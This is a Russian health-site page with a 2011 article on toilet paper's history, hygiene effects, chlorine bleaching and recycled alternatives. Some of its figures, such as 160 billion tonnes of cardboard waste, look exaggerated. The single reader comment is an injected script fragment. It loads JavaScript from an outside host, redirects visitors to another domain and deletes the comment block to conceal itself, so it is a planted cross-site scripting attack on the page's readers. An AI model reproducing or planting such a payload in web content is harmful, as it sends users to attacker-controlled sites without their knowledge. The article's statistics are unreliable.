Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Та, что все стерпит  >>  Та, что все стерпит
 
Обратная связь
 

Та, что все стерпит

Размер шрифта
30 мая 2011 00:01
  • google_analytics: false
  • Нравится

Туалетная бумага была признана самым комфортным изобретением 20 века. Тем самым она обошла застежку-молнию и замороженную еду. Первыми пользоваться бумагой в гигиенических целях стали на родине бумаги – в Китае, где она стала привилегией монарших особ.

Туалетная бумага

Александр Тушкин / «Здоровье-инфо»

До изобретения туалетной бумаги люди использовали самые различные материалы. Прежде всего, это были предметы естественного происхождения – комья земли, широкие листья, трава, снег, кожура фруктов. Древние римляне оставляли в уборных палки с губками. А мусульмане до сих пор предпочитают всем остальным процедурам омовение, что также оправдано с медицинской точки зрения.

В средневековой Европе простой люд использовал кусочки старой ткани. Гигант Гаргантюа из романа писателя 16 века Франсуа Рабле советовал подтираться пушистым гусенком. С распространением печати в уборных прочно поселились газеты. Книги не подходили для этих целей, поэтому люди пользовались газетными листами вплоть до конца 19 века. В некоторых изданиях даже делали специальное отверстие, чтобы листы можно было вешать на стену туалета.

В 1880-х британец Уильям Олкок нашел альтернативу газетным листам. Однако из-за специфической области применения Олкок не запатентовал свое изобретение и стыдливо называл его «бумажные бигуди». По той же причине свое название на бумаге боялась ставить и производившая его в 1890-х американская фирма Scott. В 1928 году швабский предприниматель Ханс Кленк впервые свернул в рулон полосы бумаги и разделил их перфорацией. Так туалетная бумага окончательно вытеснила газеты из уборных.

Медицинский аспект

В состав типографских олиф входят сиккативы – катализаторы высыхания растительных масел. Они состоят из солей металлов, чаще всего свинца. Растворители в чернилах, применяемых при офсетной печати, оказывают вредное воздействие на организм человека, особенно на печень. Считается, что если подтираться газетами, то это может спровоцировать рак прямой кишки. Кроме того, газетная бумага может сильно раздражать анус и даже повредить кожу.

Топ-10 забавных фактов о туалетной бумаге
1.Мы проводим в туалете почти 3 года своей жизни.
2.В среднем рулона туалетной бумаги хватает на 5 дней.
3.Американцы в сельской местности долгое время пользовались початками кукурузы для подтирания.
4.23-летний депутат парламента немецкого города Штральзунде был пойман завхозом здания на краже туалетной бумаги. За несколько месяцев народный избранник украл почти 200 рулонов.
5.Из общественных туалетов крадут менее 2% туалетной бумаги.
6.В 2005 году португальская компания Renova представила черную туалетную бумагу.
7.В одном из отчетов завхоза Пентагона была сказано, что служащие расходуют 666 рулонов туалетной бумаги ежедневно.
8.Самая высокая цена на туалетную бумагу в Великобритании.
9.Рулона на 1500 «квадратиков» в туалете ресторана хватает на 71 посетителя.
10.Во время войны в Ираке американцы производили туалетную бумагу с изображением Бен Ладена, после – с изображением Джорджа Буша.

Однако и туалетная бумага вредит прямой кишке. Ее задача – механическая очистка внешнего сфинктера от каловых масс. При трении даже самая лучшая бумага раздражает анус и не может полностью удалить частицы экскрементов. Обязательно после дефекации подмойтесь прохладной водой.

Если позволяют финансы и размеры уборной, установите биде. Вода намного лучше очищает анус и даже позволяет проводить легкий массаж. Альтернативой биде может стать шланг с насадкой, установленный рядом с унитазом.

Не покупайте туалетную бумагу из Поднебесной. Несмотря на богатые традиции изготовления бумаги, китайское сырье сильно загрязнено. Такая бумага может спровоцировать гинекологические инфекции и кожные болезни, так как содержит патогенные бактерии.

Иногда в продаже встречается ароматизированная туалетная бумага. Она может вызвать аллергические реакции, как и бумага с красителями. Лучше всего покупать туалетную бумагу без примесей.

Какой цвет предпочитаете?

Результаты опроса независимой исследовательской компании «Ромир» в июле 2007 года показали, что 47% россиян выбирает туалетную бумагу белого цвета, 17% – серого и 7% – розового. На остальные цвета пришлось менее чем по 10% голосов. Интересно, что 3% опрошенных не пользуются бумагой вообще.

Белый цвет позволил маркетологам выстроить рекламную кампанию – белый цвет у потребителей ассоциируется с чистоплотностью. На белой бумаге легче определить степень загрязнения. Туалетную бумагу также отбеливают для того, чтобы вымыть лигнин – сложное полимерное соединение, содержащееся в клетках сосудистых растений. Это позволяет улучшить потребительские качества туалетной бумаги – ее прочность и мягкость.

Туалетная бумага

Большинство производителей использует хлор для отбеливания туалетной бумаги. Хлор чрезвычайно ядовит и образует множество токсичных соединений, в частности, диоксинов, которые позднее попадают в организм человека через воду.

Некоторые компании, например, Seventh Generation, Green Forest, Planet, 365 Whole Foods, Earth First, используют менее вредные вещества, такие как перекись водорода и гидросульфид натрия, для отбеливания туалетной бумаги, изготовленной из макулатуры. Макулатура не содержит лигнин, так как он был уже вымыт при первичном отбеливании бумаги.

В июле 2009 года на Неманском ЦБК открылся цех по бесхлорному отбеливанию бумаги. Это первый и единственный подобный цех в России. Специалисты отмечают, что большинство российских ЦБК будут переходить на бесхлорный способ отбеливания под давлением европейских фирм, закупающих в России бумагу и целлюлозу.

Можно ли сэкономить?

Туалетная бумага не является главной угрозой лесам: вместе с косметическими салфетками она составляет менее 10% индустрии изделий из древесины. Тем не менее, экологи знают, как сократить и эту цифру. Доходит до смешного: американская певица Шерил Кроу предложила законодательно ограничить использование туалетной бумаги до одного квадратика за визит, в «досадных случаях» – до трех.

Главным образом, экологические активисты ратуют за увеличение доли вторсырья в производстве туалетной бумаги. Лишь 10-12% произведенной в России бумаги поступает в пункты приема макулатуры и затем перерабатывается. Хотя при производстве этого предмета гигиены нет никакой необходимости использовать первичную целлюлозу. Туалетная бумага не требует ни особой прочности и долговечности, ни сверхъестественной белизны. Одна тонна макулатурной бумаги позволяет сэкономить примерно 5 кубометров древесины – или до 20-25 деревьев. Другими словами, доля макулатуры в производстве туалетной бумаги должна увеличиться в несколько раз.

Впрочем, существуют проекты изготовления туалетной бумаги не из древесины, а из листов конопли, кенафа, банана. Компания Poopoopaper производит бумагу из экскрементов слонов, лошадей, коров и даже панд. Дело в том, что кал травоядных животных содержит целлюлозу в хорошо измельченном виде. Из одной «кладки» слона получается 25 больших листов бумаги, которую можно использовать не только в гигиенических целях, но даже для письма. Бумага из экскрементов не имеет запаха. Кстати, по похожей технологии в Скандинавии делают бумагу из лосиного кала, а на острове Тасмания – из кенгуриного. Экологи утверждают, что незачем использовать первичную целлюлозу для туалетной бумаги, для этого есть масса ненужных на первых взгляд материалов.

Некоторые активисты экологических движений используют кусочки хлопковой ткани для подтирания, а затем стирают их. Они говорят, что в практическом смысле это намного удобнее, чем туалетная бумага: ткань можно предварительно смачивать, она намного мягче, хлопок же эффективнее устраняет налипший кал. Такие «семейные салфетки» можно использовать на протяжении нескольких лет.

На данный момент индустрия уже сделала шаг вперед к экологически чистому будущему. В 2010 году американская компания Kimberly-Clark запатентовала способ производства туалетной бумаги без внутренней картонной трубки. Рулон имеет отверстие для держателя благодаря новым линиям производства, позволяющим намотать бумагу без картонной трубки. Изобретение избавит планету от 160 млрд тонн мусора в год, так как картонная камера обычно не отправляется на переработку. Новый способ позволяет экономить на картоне и клее для фиксации бумаги на картонной трубке. В ближайшем будущем картонок лишатся и бумажные полотенца.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Пять миллионов людей на земном шаре страдают от воспалительных заболеваний кишечника   Диагноз «колоректальный рак» можно поставить по дыханию   Рак кишечника: меньше знаешь, крепче спишь?   Новый тест скажет, будет у вас рак или нет  
11 февраля 2013Диагноз «колоректальный рак» можно поставить по дыханию 18 октября 2012Новый тест скажет, будет у вас рак или нет
 
09 августа 2012Раковые клетки теперь не смогут скрыться! 03 июля 2012Созданы лекарства, которые обучают организм убивать рак
 

Слайдшоу

1
Факторы, которые влияют на возникновение рака
Супереда против рака
Продукты против рака

Тесты

Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.